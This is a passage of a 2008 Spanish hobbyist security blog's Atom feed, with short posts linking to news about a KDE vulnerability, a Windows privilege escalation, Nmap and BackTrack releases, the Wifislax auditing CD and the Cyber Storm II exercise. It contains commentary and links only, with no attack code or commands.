/&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_x7dE_ssr2K8/SHMXj680ezI/AAAAAAAAAHs/GM3eB3GgR-0/s1600-h/wifislax31.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_x7dE_ssr2K8/SHMXj680ezI/AAAAAAAAAHs/GM3eB3GgR-0/s200/wifislax31.jpg" alt="" id="BLOGGER_PHOTO_ID_5220542298939751218" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Este Live Cd tiene las&lt;a href="http://www.wi-foo.com/index-3.html"&gt; herramientas necesarias&lt;/a&gt; para realizar una auditoría, y lo que es más importante...los drivers para diferentes tarjetas wifi! larga vida al &lt;a href="http://en.wikipedia.org/wiki/RFMON"&gt;modo monitor....!&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Los &lt;a href="http://www.wifislax.com/principal/foro.php"&gt;foros &lt;/a&gt;como siempre en estos casos son de obligada visita, para enterarnos como se realiza &lt;a href="http://foro.seguridadwireless.net/index.php/topic,7482.0.html"&gt;una auditoría Wifi&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Así que ya sabeis descargar el live cd &lt;a href="http://www.wifislax.com/descargas.php"&gt;aqui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ahhhh como siempre os diré que este tipo de herramientas son con fines educativos y no para pisarle el wifi al pobre vecino de turno....porque quien sabe a lo mejor el vecino soy yo mismo! y os llevais &lt;a href="http://www.hjmscancun.com/imagenes/patada%20y%20defensa.JPG"&gt;una sorpresa&lt;/a&gt;!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-934191266847101038?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/934191266847101038/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=934191266847101038' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/934191266847101038'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/934191266847101038'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/07/ahora-me-di-por-la-auditra-de-redes.html' title='Ahora me dió por la auditoría de redes Wifi ;)'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_x7dE_ssr2K8/SHMXj680ezI/AAAAAAAAAHs/GM3eB3GgR-0/s72-c/wifislax31.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-6391876981405279752</id><published>2008-06-09T17:36:00.002+02:00</published><updated>2008-06-09T17:38:55.314+02:00</updated><title type='text'>Volveré....</title><content type='html'>Buenas a todos...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Por motivos laborales y personales he dejado un mes el blog de lado...en breve, lo actulizaré con nuevas cosillas...&lt;br /&gt;&lt;br /&gt;Saludos!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-6391876981405279752?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/6391876981405279752/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=6391876981405279752' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/6391876981405279752'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/6391876981405279752'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/06/volver.html' title='Volveré....'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-1928620648367211357</id><published>2008-04-29T15:08:00.005+02:00</published><updated>2008-04-29T15:21:58.068+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='BugTrack'/><title type='text'>Vulnerabilidad en KDE 3.x y 4.x</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_x7dE_ssr2K8/SBcgu6CijzI/AAAAAAAAAHE/YrQdRvTgPQQ/s1600-h/603px-KDE_logo.svg.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_x7dE_ssr2K8/SBcgu6CijzI/AAAAAAAAAHE/YrQdRvTgPQQ/s200/603px-KDE_logo.svg.png" alt="" id="BLOGGER_PHOTO_ID_5194656685421137714" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Se ha publicado la existencia de diferentes vulnerabilidades en los entornos gráficos KDE 3.x y 4.x (que decir que son los entornos gráficos de diferentes distribuciones de Linux).&lt;br /&gt;&lt;br /&gt;Las vulnerabilidades son las siguientes:&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt; La primera vulnerabilidad está causada por un desbordamiento de búfer&lt;br /&gt;basado en pila debido a que KDE KHTML falla al comprobar los límites de&lt;br /&gt;las entradas introducidas por un usuario al procesar archivos PNG&lt;br /&gt;maliciosos. Esto podría ser aprovechado por un atacante remoto para&lt;br /&gt;ejecutar código arbitrario o causar una denegación de servicio en KDE.&lt;/li&gt;&lt;li&gt;La segunda vulnerabilidad está causada porque la utilidad&lt;br /&gt;'start_kdeinit' de KDE podría permitir múltiples escaladas de&lt;br /&gt;privilegios provocadas por fallos al comprobar las entradas.&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;Personalmente me encanta la segunda vulnerabilidad, ¿por que?....porque cuantas máquinas con X Windows conoceis en las DMZ? jajajajaja (risa malefica) muchos admin les gusta tener entorno GUI.... Hace falta tener acceso de root...? jajaja (más malefica) o con un usuario básico ya se puede....ejem...&lt;br /&gt;&lt;br /&gt;Lo mejor....como siempre parchear.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-1928620648367211357?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/1928620648367211357/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=1928620648367211357' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1928620648367211357'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1928620648367211357'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/04/vulnerabilidad-en-kde-3x-y-4x.html' title='Vulnerabilidad en KDE 3.x y 4.x'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_x7dE_ssr2K8/SBcgu6CijzI/AAAAAAAAAHE/YrQdRvTgPQQ/s72-c/603px-KDE_logo.svg.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-787466474150714811</id><published>2008-04-29T12:52:00.003+02:00</published><updated>2008-04-29T12:58:50.414+02:00</updated><title type='text'>Nuevo número INSECURE MAGAZINE</title><content type='html'>Se ha publicado el nuevo número de la revista INSECURE MAGAZINE, revista toltalmente gratuita y para mi gusto algunos artículos osn interesantes&lt;br /&gt;&lt;br /&gt;Para descargarla pulsa &lt;a href="http://www.net-security.org/dl/insecure/INSECURE-Mag-16.pdf"&gt;aqui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;En breve nuevas entradas....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-787466474150714811?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/787466474150714811/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=787466474150714811' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/787466474150714811'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/787466474150714811'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/04/nuevo-nmero-insecure-magazine.html' title='Nuevo número INSECURE MAGAZINE'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-3053930083028430601</id><published>2008-04-20T11:33:00.005+02:00</published><updated>2008-04-20T12:01:15.140+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='BugTrack'/><title type='text'>Escalada de privilegios en Micro$oft Window$</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_x7dE_ssr2K8/SAsSpKPErtI/AAAAAAAAAG0/9vKIKzbsGkk/s1600-h/microsoft_tentacles.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_x7dE_ssr2K8/SAsSpKPErtI/AAAAAAAAAG0/9vKIKzbsGkk/s320/microsoft_tentacles.jpg" alt="" id="BLOGGER_PHOTO_ID_5191263493806141138" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Una vez más...&lt;br /&gt;&lt;br /&gt;Hará cosa de un mes leí en &lt;a href="http://www.kriptopolis.org/microsoft-reconoce-vulnerabilidad-windows"&gt;Kriptopolis&lt;/a&gt; un artículo interesantísimo ;) en dicho artículo se contaba que un consultor de seguridad había encontrado una manera de vulneral los nuevos servers 2008 de Micro$oft..&lt;br /&gt;&lt;br /&gt;Pues bien, dicho &lt;a href="http://www.argeniss.com/about.html"&gt;consultor&lt;/a&gt; ha demostrado que no solo los nuevos servidores Window$ $erver 2008 son vulnerables, sino que afecta también a la familia de servidores 2003, y agarraos!! a Window$ Vi$ta y Window$ Xp. La demostración se ha llevado a cabo en &lt;a href="http://conference.hackinthebox.org/hitbsecconf2008dubai/?page_id=182"&gt;HITBSecConf 2008 en Dubai&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;La vulnerabilidad trata de una escalada de privilegios en usuarios del sistema como NETWORK SERVICE or LOCAL SERVICE..ahí queda eso.... La presentación la teneís &lt;a href="http://www.argeniss.com/research/TokenKidnapping.pdf"&gt;aquí...&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Micro$oft ha publicado un &lt;a href="http://www.microsoft.com/technet/security/advisory/951306.mspx"&gt;boletín de seguridad &lt;/a&gt;en donde avisa de la vulnerabilidad, pero donde no se ve nada de ningún parche... quien sabe a lo mejor dentro de un mes...un año...lo sacan..&lt;br /&gt;&lt;br /&gt;Mientras en &lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1436"&gt;CVE...&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Igualito que linux y&lt;a href="http://www.kriptopolis.org/bug-kernel-linux"&gt; los parches a sus vulnerabilidades..&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;No os digo na, de como se van a llevar esta primavera los &lt;a href="http://en.wikipedia.org/wiki/Zero_day"&gt;Xploit 0-Day&lt;/a&gt;, para esta vulnerabilidad&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-3053930083028430601?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/3053930083028430601/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=3053930083028430601' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/3053930083028430601'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/3053930083028430601'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/04/una-vez-msescalada-de-privilegios-en.html' title='Escalada de privilegios en Micro$oft Window$'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_x7dE_ssr2K8/SAsSpKPErtI/AAAAAAAAAG0/9vKIKzbsGkk/s72-c/microsoft_tentacles.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-8147000408007956344</id><published>2008-04-09T12:27:00.002+02:00</published><updated>2008-04-09T12:34:19.424+02:00</updated><title type='text'>El arte de la intrusión</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_x7dE_ssr2K8/R_ybkAdaKYI/AAAAAAAAAGs/Qkr5rduD35Q/s1600-h/1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_x7dE_ssr2K8/R_ybkAdaKYI/AAAAAAAAAGs/Qkr5rduD35Q/s320/1.jpg" alt="" id="BLOGGER_PHOTO_ID_5187191913724914050" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Un poco de lectura y de paso de cultura...que no leemos nada!!!&lt;br /&gt;&lt;br /&gt;En uno de los foros que estoy susbcrito uno de los parroquinos ha dejao un link desde donde uno puede descargarse el libro "El arte de la intrusión" por Kevin D Mitnick&lt;br /&gt;&lt;br /&gt;Me lo he descargado y en cuanto tenga tiempo le echaré un vistazo...&lt;br /&gt;&lt;br /&gt;Para descargarlo pulsa &lt;a href="http://www.gigasize.com/get.php?d=twqm8k7trzd"&gt;aquí&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-8147000408007956344?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/8147000408007956344/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=8147000408007956344' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8147000408007956344'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8147000408007956344'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/04/el-arte-de-la-intrusin.html' title='El arte de la intrusión'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_x7dE_ssr2K8/R_ybkAdaKYI/AAAAAAAAAGs/Qkr5rduD35Q/s72-c/1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-5717927515528769327</id><published>2008-04-02T13:07:00.006+02:00</published><updated>2008-04-02T13:17:41.474+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Esos CPD´s...(una imagen vale más que....)</title><content type='html'>Quien no ha entrado en algún CPD y a visto estas cosas??&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_x7dE_ssr2K8/R_NqFwdaKVI/AAAAAAAAAGU/uoeyBISO-6g/s1600-h/3.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_x7dE_ssr2K8/R_NqFwdaKVI/AAAAAAAAAGU/uoeyBISO-6g/s200/3.jpg" alt="" id="BLOGGER_PHOTO_ID_5184604243173714258" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_x7dE_ssr2K8/R_NqZwdaKWI/AAAAAAAAAGc/vsF-6SdUuRA/s1600-h/4.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_x7dE_ssr2K8/R_NqZwdaKWI/AAAAAAAAAGc/vsF-6SdUuRA/s200/4.jpg" alt="" id="BLOGGER_PHOTO_ID_5184604586771097954" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_x7dE_ssr2K8/R_NqsQdaKXI/AAAAAAAAAGk/jtxl6OxlHFk/s1600-h/15.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_x7dE_ssr2K8/R_NqsQdaKXI/AAAAAAAAAGk/jtxl6OxlHFk/s200/15.jpg" alt="" id="BLOGGER_PHOTO_ID_5184604904598677874" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Una imagen vale más que mil palabras...y sino pulsar &lt;a href="http://englishrussia.com/?p=1836"&gt;aqui &lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-5717927515528769327?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/5717927515528769327/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=5717927515528769327' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5717927515528769327'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5717927515528769327'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/04/esos-cpdsuna-imagen-vale-ms-que.html' title='Esos CPD´s...(una imagen vale más que....)'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_x7dE_ssr2K8/R_NqFwdaKVI/AAAAAAAAAGU/uoeyBISO-6g/s72-c/3.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-7982955275593182551</id><published>2008-03-26T17:04:00.003+01:00</published><updated>2008-03-26T17:15:52.298+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><category scheme='http://www.blogger.com/atom/ns#' term='Nmap'/><title type='text'>New Versión tool:Nmap 4.60</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_x7dE_ssr2K8/R-p2YwdaKUI/AAAAAAAAAGM/zXz6q1hkYAo/s1600-h/nmap_bnr_kyra2.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_x7dE_ssr2K8/R-p2YwdaKUI/AAAAAAAAAGM/zXz6q1hkYAo/s400/nmap_bnr_kyra2.gif" alt="" id="BLOGGER_PHOTO_ID_5182084488940366146" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Liberada la nueva versión de la todopoderosa herramienta Nmap 4.60, una vez más Fydoor incluye más &lt;a href="http://nmap.org/changelog.html"&gt;funcionalidades&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Que decir de esta herramienta? si hasta aparece en &lt;a href="http://nmap.org/movies.html"&gt;películas&lt;/a&gt;&lt;a href="http://nmap.org/movies.html"&gt;!!!&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A todo esto, Nmap a que fase pertenece dentro de un pentest? enumeración, footprinting, scanning? ;)&lt;br /&gt;&lt;br /&gt;Deberías descargártela &lt;a href="http://nmap.org/download.html"&gt;aqui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Os imaginais una auditoría sin Nmap?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-7982955275593182551?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/7982955275593182551/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=7982955275593182551' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/7982955275593182551'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/7982955275593182551'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/03/new-versin-toolnmap-460.html' title='New Versión tool:Nmap 4.60'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_x7dE_ssr2K8/R-p2YwdaKUI/AAAAAAAAAGM/zXz6q1hkYAo/s72-c/nmap_bnr_kyra2.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-6371048777507920046</id><published>2008-03-19T14:19:00.006+01:00</published><updated>2008-03-19T14:44:21.696+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Cyber Storm II</title><content type='html'>El otro día leí que el Tio Sam había realizado unas "maniobras" durante 5 días atacando a sus sistemas TIC.&lt;br /&gt;&lt;br /&gt;La finalidad de dichas "maniobras" era probar la respuesta de sus sistemas ante diferentes cyber-ataques. Las "maniobras" han recibido el nombre de "Cyber Storm II".&lt;br /&gt;&lt;br /&gt;Han participado expertos de seguridad informática de 5 paises y más de 40 empresas privadas. Los participantes han tenido que sufrir 1800 ataques simulados desde diferentes ubicaciones y cometido por "hackers" (huyyyyyyy por hackers que malosss).&lt;br /&gt;&lt;br /&gt;Os imaginais hacer lo mismo con las infraestrudturas TIC de nuestro país? jajajajaja.&lt;br /&gt;&lt;br /&gt;Las maniobras serían conocidas como...imaginar jajajaja. La verdad y sin que sirva de precedente, es que este tipo de iniciaivas, me parecen una muy buena idea, aunque sea idea de los yankis. Como de verdad sacas una foto a la seguridad de tus sistemas de información es viendo como responden estos a verdaderos ataques y dejando de especular.&lt;br /&gt;&lt;br /&gt;La noticia &lt;a href="http://www.invertia.com.mx/noticias/noticia.aspx?idNoticia=200803140053_AFP_005300-TX-TUD43"&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;En el 2006 los yankis ya hicieron algo similar &lt;a href="http://cryptome.org/cyberstorm.pdf"&gt;más información&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span id="spanNoticia" class="tit"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-6371048777507920046?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/6371048777507920046/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=6371048777507920046' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/6371048777507920046'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/6371048777507920046'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/03/maniobras-hacking.html' title='Cyber Storm II'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-2953679980412776059</id><published>2008-03-12T12:25:00.004+01:00</published><updated>2008-03-12T12:45:28.367+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Instalando BackTrack 3 Beta</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_x7dE_ssr2K8/R9fCSqn8WNI/AAAAAAAAAGE/9VMGr9Z6Ka0/s1600-h/Nuevo+Imagen+de+mapa+de+bits.bmp"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_x7dE_ssr2K8/R9fCSqn8WNI/AAAAAAAAAGE/9VMGr9Z6Ka0/s400/Nuevo+Imagen+de+mapa+de+bits.bmp" alt="" id="BLOGGER_PHOTO_ID_5176819922620930258" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Buenas a todos....&lt;br /&gt;&lt;br /&gt;Seguro que a más de uno le interesaría tener la versión 3 Beta de Backtrack en una de sus máquinas virtuales... ;)&lt;br /&gt;&lt;br /&gt;Pues como a mi me ha pasado ya, os paso el link de un video donde lo explica bastante bien....&lt;br /&gt;&lt;br /&gt;Video &lt;a href="http://bt.solutiondesigns.net/1/"&gt;aqui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Dedicado a los futuros CEH ;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-2953679980412776059?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/2953679980412776059/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=2953679980412776059' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2953679980412776059'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2953679980412776059'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/03/instalando-backtrack-3-beta.html' title='Instalando BackTrack 3 Beta'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_x7dE_ssr2K8/R9fCSqn8WNI/AAAAAAAAAGE/9VMGr9Z6Ka0/s72-c/Nuevo+Imagen+de+mapa+de+bits.bmp' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-235133942770759572</id><published>2008-03-02T20:18:00.003+01:00</published><updated>2008-03-02T20:30:35.123+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Incidentes de seguridad'/><title type='text'>Defecement....to Izquierda Unida</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_x7dE_ssr2K8/R8r-FsuSEdI/AAAAAAAAAF0/74v0UHhXDkc/s1600-h/foto_273019_CAS.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_x7dE_ssr2K8/R8r-FsuSEdI/AAAAAAAAAF0/74v0UHhXDkc/s400/foto_273019_CAS.jpg" alt="" id="BLOGGER_PHOTO_ID_5173226495846519250" border="0" 